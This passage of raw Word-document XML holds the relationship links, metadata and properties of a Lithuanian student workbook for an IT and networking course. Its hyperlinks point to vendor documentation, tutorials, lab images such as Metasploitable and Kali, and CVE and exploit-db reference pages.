TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.computernetworkingnotes.com/ccna-study-guide/vlan-configuration-commands-step-by-step-explained.html" TargetMode="External"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://windows.microsoft.com/en-us/windows/microsoft-services-agreement" TargetMode="External"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amd.com/en/products/processors-desktop" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linuxhint.com/install_centos8_virtualbox/" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/List_of_MediaTek_processors" TargetMode="External"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.slavasoft.com/download.htm" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sysaid.com/blog/entry/itsm-basics-a-simple-introduction-to-incident-management" TargetMode="External"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.freedownloadmanager.org/Windows-PC/Ekahau-HeatMapper-FREE.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amd.com/en/products/processors-desktop" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2019" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/channel/UCP2uPp7TUXwJCicB0byzDnQ" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.networkstraining.com/best-network-diagram-software/" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/p/wifi-analyzer/9nblggh33n0n?activetab=pivot:overviewtab" TargetMode="External"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/system-center/scsm/install-one-computer?view=sc-sm-2019" TargetMode="External"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://information.rapid7.com/metasploitable-download.html" TargetMode="External"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://community.cisco.com/t5/routing/rv340-lost-his-configuration-after-power-outage/td-p/4097598" TargetMode="External"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.computernetworkingnotes.com/ccna-study-guide/vlan-practice-lab-setup-in-packet-tracer.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item4.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dskoli.in/blog/windows-server-2019-with-desktop-experience-full-interface-clean-installation" TargetMode="External"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/windows/backup-and-restore-in-windows-10-352091d2-bb9d-3ea3-ed18-52ef2b88cbef" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cdimage.kali.org/kali-2020.4/kali-linux-2020.4-installer-amd64.iso" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gadgetsexplorer.com/2019/10/08/whats-the-difference-between-ddr2-ddr3-and-ddr4-ram/" TargetMode="External"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisco.com/c/en/us/td/docs/security/security_management/cs-mars/4-3/user/guide/local_controller/cfgrtrsw.html" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.searchenginewatch.com" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.neweggbusiness.com/smartbuyer/over-easy/5-free-tools-to-draw-a-network-diagram/" TargetMode="External"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dskoli.in/blog/windows-server-2019-with-desktop-experience-full-interface-clean-installation" TargetMode="External"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intel.com/content/www/us/en/products/processors/core.html" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/system-center/scsm/incident-mgt?view=sc-sm-2019" TargetMode="External"/><Relationship Id="rId412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/lotus-fruit/top-10-operating-systems-for-ethical-hackers-and-penetration-testers-2020-list-b523b611cdbb" TargetMode="External"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.networkstraining.com/best-network-diagram-software/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/windows-server/get-started-19/install-upgrade-migrate-19" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.diagrams.net" TargetMode="External"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html" TargetMode="External"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.rapid7.com/metasploit/metasploitable-2/" TargetMode="External"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.networkstraining.com/best-network-diagram-software/" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://download.fedoraproject.org/pub/alt/releases/33/Labs/x86_64/iso/Fedora-Security-Live-x86_64-33-1.2.iso" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linuxhint.com/install_centos8_virtualbox/" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.seagate.com/gb/en/support/kb/the-bios-does-not-detect-or-recognize-the-ata-sata-hard-drive-168595en/" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html" TargetMode="External"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.fosslinux.com/7705/how-to-install-and-configure-zabbix-on-centos-7.htm" TargetMode="External"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.adobe.com/lt/products/photoshop-elements/tech-specs.html" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tech4fresher.com/best-wifi-analyzer-for-windows/" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisco.com/c/en/us/products/routers/product-listing.html" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.capterra.com/incident-management-software/" TargetMode="External"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=mN12es1rbJ8" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/system-center/scsm/incident-mgt?view=sc-sm-2019" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/lt-lt/microsoft-365/business-insights-ideas/resources/tips-for-mapping-your-network-diagram?SilentAuth=1" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://networklessons.com/switching/intervlan-routing" TargetMode="External"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/system-center/scsm/dcm-incidents?view=sc-sm-2019" TargetMode="External"/><Relationship Id="rId403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pcmag.com/how-to/what-to-do-when-your-computer-wont-start" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kb.acronis.com/content/65468" TargetMode="External"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://askme4tech.com/acronis-true-image-2020-review-tutorial" TargetMode="External"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-db.com/download/8572" TargetMode="External"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.drivereasy.com/knowledge/fixed-bios-not-detecting-ssd-in-computer/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intel.com/content/www/us/en/products/processors/core.html" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mozilla.org/" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ui.com/unifi-routing/usg/" TargetMode="External"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.txt" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.qualcomm.com/products/processors" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7335" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.virtualbox.org/wiki/Downloads" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.jpg"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lifewire.com/how-to-fix-a-computer-that-wont-turn-on-2624450" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/exchange/high-availability/disaster-recovery/windows-server-backup?view=exchserver-2019" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.txt" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec/" TargetMode="External"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.computerhope.com/issues/ch000179.htm" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netacad.com/courses/packet-tracer/introduction-packet-tracer" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.linuxbabe.com/redhat/install-nextcloud-rhel-8-centos-8-nginx-lemp" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pcmag.com/how-to/what-to-do-when-your-computer-wont-start" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://devopscube.com/best-opensource-monitoring-tools/" TargetMode="External"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/channel/UCP2uPp7TUXwJCicB0byzDnQ" TargetMode="External"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.faqs.org/rfcs/rfc826.html" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://knowledge.autodesk.com/support/autocad/troubleshooting/caas/sfdcarticles/sfdcarticles/System-requirements-for-AutoCAD-2021-including-Specialized-Toolsets.html" TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kb.acronis.com/content/65468" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://motionarray.com/learn/davinci-resolve/" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=mN12es1rbJ8" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://instagram.com/legal/terms/" TargetMode="External"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.png"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.intel.com/content/www/us/en/products/processors/core.html" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisco.com/c/en/us/products/collateral/wireless/aironet-1600-series/data_sheet_c78-715702.html" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.computernetworkingnotes.com/ccna-study-guide/vlan-configuration-commands-step-by-step-explained.html" TargetMode="External"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/tos" TargetMode="External"/><Relationship Id="rId405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.google.com/store/apps/details?id=com.farproc.wifi.analyzer&amp;hl=en_US&amp;gl=US" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0597" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.qualcomm.com/products/processors" TargetMode="External"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kb.acronis.com/content/65468" TargetMode="External"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://motionarray.com/learn/davinci-resolve/davinci-resolve-system-requirements/" TargetMode="External"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/List_of_MediaTek_processors" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.searchenginewatch.com/" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://resources.infosecinstitute.com/topic/owasp-top-10-tools-and-tactics/" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ui.com/edgemax/edgeswitch-10xp/" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.transcend-info.com/Support/FAQ-296" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/lt-lt/microsoft-365/business-insights-ideas/resources/tips-for-mapping-your-network-diagram?SilentAuth=1" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="cid:image001.jpg@01D40F86.D718AD60" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.acronis.com/en-eu/homecomputing/thanks/acronis-true-image-2021/" TargetMode="External"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.jpg"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cgdirector.com/best-computer-3d-modeling-rendering/" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nksc.lt/pranesti.html" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE%202009-1185" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.qualcomm.com/products/processors" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.logicalincrements.com/" TargetMode="External"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bestmonitoringtools.com/how-to-install-zabbix-server-on-centos-or-rhel/" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ccleaner.com/knowledge/why-your-pc-is-so-slow-and-how-you-can-speed-it-up" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.softwaresuggest.com/help-desk-software/free-open-source-softwares" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://networklessons.com/switching/intervlan-routing" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://thenextweb.com/plugged/2019/12/22/build-pc-tips-computer/" TargetMode="External"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.solidworks.com/support/system-requirements" TargetMode="External"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amd.com/en/products/processors-desktop" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.adobe.com/lt/products/photoshop-elements/tech-specs.html" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=3TPsuio8PP8" TargetMode="External"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://about.pinterest.com/en/terms-service" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisco.com/c/en/us/products/routers/rv160w-wireless-ac-vpn-router/index.html" TargetMode="External"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wireshark.org" TargetMode="External"/><Relationship Id="rId351" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/system-center/scsm/user-roles?view=sc-sm-2019" TargetMode="External"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/system-center/scsm/runbooks?view=sc-sm-2019" TargetMode="External"/><Relationship Id="rId407" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/evalcenter/evaluate-windows-server-2019" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://repo.zabbix.com/zabbix/5.2/rhel/8/x86_64/zabbix-release-5.2-1.el8.noarch.rpmdnf" TargetMode="External"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.microsoft.com/en-us/windows/backup-and-restore-in-windows-10-352091d2-bb9d-3ea3-ed18-52ef2b88cbef" TargetMode="External"/><Relationship Id="rId30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2B7F8E6512A04496767AD35F3EA194" ma:contentTypeVersion="7" ma:contentTypeDescription="Kurkite naują dokumentą." ma:contentTypeScope="" ma:versionID="f42beace96b5680cef2d480ae0871df0">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="0a5273d2-630e-4acd-b682-614fb6c9f5a3" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="24f12a51e47226c4ed1fdd994d8423eb" ns2:_="">
    <xsd:import namespace="0a5273d2-630e-4acd-b682-614fb6c9f5a3"/>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273d2-630e-4acd-b682-614fb6c9f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0a5273d2-630e-4acd-b682-614fb6c9f5a3" xsi:nil="true"/>
    <AppVersion xmlns="0a5273d2-630e-4acd-b682-614fb6c9f5a3" xsi:nil="true"/>
    <NotebookType xmlns="0a5273d2-630e-4acd-b682-614fb6c9f5a3" xsi:nil="true"/>
    <CultureName xmlns="0a5273d2-630e-4acd-b682-614fb6c9f5a3" xsi:nil="true"/>
    <FolderType xmlns="0a5273d2-630e-4acd-b682-614fb6c9f5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1A25-DE0B-4629-A6E6-3E33D4FC9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273d2-630e-4acd-b682-614fb6c9f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2192A-F3CC-4374-AE29-5BCEE208903A}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{3F736AB8-CDCE-4D5A-81E8-52A24A565744}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="0a5273d2-630e-4acd-b682-614fb6c9f5a3"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{79F2968F-321F-4971-8936-5B2067E8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0</Pages>
  <Words>165210</Words>
  <Characters>94171</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>784</Lines>
  <Paragraphs>517</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>Title</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="1" baseType="lpstr">
      <vt:lpstr>Teorinių ir praktinių užduočių mokinio sąsiuvinis</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Grizli777</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>258864</CharactersWithSpaces>
  <SharedDoc>false</SharedDoc>
  <HLinks>
    <vt:vector size="1926" baseType="variant">
      <vt:variant>
        <vt:i4>7471186</vt:i4>
      </vt:variant>
